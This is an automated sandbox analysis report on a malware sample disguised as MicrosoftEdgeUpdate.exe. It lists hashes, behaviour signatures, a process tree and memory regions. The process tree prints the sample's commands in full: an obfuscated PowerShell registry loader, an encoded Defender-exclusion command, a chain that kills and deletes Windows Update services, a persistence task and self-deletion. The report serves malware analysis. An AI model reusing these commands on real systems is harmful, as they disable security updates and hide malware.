Analysis
-
max time kernel
141s -
max time network
54s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
16-01-2023 01:14
General
-
Target
MicrosoftEdgeUpdate.exe
-
Size
4.9MB
-
MD5
8223e55c97c61478aa4230b2ca498a38
-
SHA1
a42c6d401fbf798806c5fe85c47cc047c189e486
-
SHA256
496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7
-
SHA512
5a2f32412d677e22602e0155a70328d9836e06eb26f59b6872b902fd044a7fb1011e066696018ae3db018282169e47e00aea3a861643662746543ab5f4d2f93d
-
SSDEEP
98304:NKB0rS8yY+gIpexlkt2GguS8qth97fOMFz7lFrL8XE:8BaQgGft2hqeh97fOmXlFk
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
VMProtect packed file 5 IoCs
Detects executables packed with VMProtect commercial packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\taskeng.exetaskeng.exe {2A791987-AFB3-4309-9A6B-4DFE21214320} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZABjAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQB5ACMAPgA="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "szxvhhjnzcny"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0315e6b4-e9fa-4937-b74b-14548ed2a2ab}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{bf7f73bd-c8f5-411e-8873-9da28377320b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZABjAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQB5ACMAPgA="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Microsoft Edge Update "3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "Microsoft Edge Update "4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"3⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "123416017413905470438565524399457175912100063222-2017876595-1859777679-1912855149"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-161298951117782093591077131628-10339490482081325232-1672618242-514342151-742310764"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-327858209-223024781643480505-79841239313936105781438514121281038575371639886"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "16276309961237584124-1314331582-1021979978-2029442596252778615751383-9494696"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exeFilesize
4.9MB
MD58223e55c97c61478aa4230b2ca498a38
SHA1a42c6d401fbf798806c5fe85c47cc047c189e486
SHA256496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7
SHA5125a2f32412d677e22602e0155a70328d9836e06eb26f59b6872b902fd044a7fb1011e066696018ae3db018282169e47e00aea3a861643662746543ab5f4d2f93d
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exeFilesize
4.9MB
MD58223e55c97c61478aa4230b2ca498a38
SHA1a42c6d401fbf798806c5fe85c47cc047c189e486
SHA256496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7
SHA5125a2f32412d677e22602e0155a70328d9836e06eb26f59b6872b902fd044a7fb1011e066696018ae3db018282169e47e00aea3a861643662746543ab5f4d2f93d
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD5d93fbfbf403720353fdb1c273933f0a1
SHA17cae51c274693dcda7d9a4e9c46928ab265f902f
SHA256e433e56709be0e40a315a05598a32efb23eae26742d2224e73ac65d07b661770
SHA512b0da60ef60a27a6bfdc4067738c47b153809b02fc041a1cadafd110a6cc00baac5cfc93d9ed7b04f79753cb95115d0a9de5988769f3ca07762761ab65d41656e
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exeFilesize
4.9MB
MD58223e55c97c61478aa4230b2ca498a38
SHA1a42c6d401fbf798806c5fe85c47cc047c189e486
SHA256496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7
SHA5125a2f32412d677e22602e0155a70328d9836e06eb26f59b6872b902fd044a7fb1011e066696018ae3db018282169e47e00aea3a861643662746543ab5f4d2f93d
-
memory/112-271-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/112-265-0x0000000077340000-0x00000000774C0000-memory.dmpFilesize
1.5MB
-
memory/112-95-0x0000000000000000-mapping.dmp
-
memory/112-242-0x00000000004039E0-mapping.dmp
-
memory/288-245-0x0000000001D00000-0x0000000001D2A000-memory.dmpFilesize
168KB
-
memory/300-243-0x0000000000A80000-0x0000000000AAA000-memory.dmpFilesize
168KB
-
memory/416-134-0x0000000000730000-0x0000000000753000-memory.dmpFilesize
140KB
-
memory/416-144-0x0000000000760000-0x000000000078A000-memory.dmpFilesize
168KB
-
memory/416-142-0x0000000000730000-0x0000000000753000-memory.dmpFilesize
140KB
-
memory/416-139-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/416-137-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/416-295-0x0000000000760000-0x000000000078A000-memory.dmpFilesize
168KB
-
memory/464-143-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/464-296-0x00000000000B0000-0x00000000000DA000-memory.dmpFilesize
168KB
-
memory/464-141-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/464-155-0x00000000000B0000-0x00000000000DA000-memory.dmpFilesize
168KB
-
memory/472-158-0x0000000000110000-0x000000000013A000-memory.dmpFilesize
168KB
-
memory/472-293-0x0000000000110000-0x000000000013A000-memory.dmpFilesize
168KB
-
memory/472-148-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/472-150-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/476-77-0x0000000000000000-mapping.dmp
-
memory/480-153-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/480-161-0x0000000000830000-0x000000000085A000-memory.dmpFilesize
168KB
-
memory/480-297-0x0000000000830000-0x000000000085A000-memory.dmpFilesize
168KB
-
memory/480-156-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/552-71-0x0000000000000000-mapping.dmp
-
memory/568-505-0x0000000000000000-mapping.dmp
-
memory/576-290-0x0000000001474000-0x0000000001477000-memory.dmpFilesize
12KB
-
memory/576-276-0x0000000000000000-mapping.dmp
-
memory/576-286-0x0000000000470000-0x000000000049A000-memory.dmpFilesize
168KB
-
memory/576-289-0x000000000147B000-0x000000000149A000-memory.dmpFilesize
124KB
-
memory/576-284-0x0000000000440000-0x000000000046A000-memory.dmpFilesize
168KB
-
memory/576-285-0x0000000001474000-0x0000000001477000-memory.dmpFilesize
12KB
-
memory/576-291-0x000000000147B000-0x000000000149A000-memory.dmpFilesize
124KB
-
memory/592-294-0x0000000000320000-0x000000000034A000-memory.dmpFilesize
168KB
-
memory/592-160-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/592-159-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/592-163-0x0000000000320000-0x000000000034A000-memory.dmpFilesize
168KB
-
memory/624-140-0x0000000077160000-0x0000000077309000-memory.dmpFilesize
1.7MB
-
memory/624-292-0x0000000077160000-0x0000000077309000-memory.dmpFilesize
1.7MB
-
memory/624-262-0x0000000000220000-0x000000000024A000-memory.dmpFilesize
168KB
-
memory/624-133-0x0000000076F40000-0x000000007705F000-memory.dmpFilesize
1.1MB
-
memory/624-132-0x0000000077160000-0x0000000077309000-memory.dmpFilesize
1.7MB
-
memory/672-165-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/672-166-0x0000000000470000-0x000000000049A000-memory.dmpFilesize
168KB
-
memory/672-167-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/672-298-0x0000000000470000-0x000000000049A000-memory.dmpFilesize
168KB
-
memory/748-171-0x00000000371A0000-0x00000000371B0000-memory.dmpFilesize
64KB
-
memory/748-170-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/748-233-0x00000000008B0000-0x00000000008DA000-memory.dmpFilesize
168KB
-
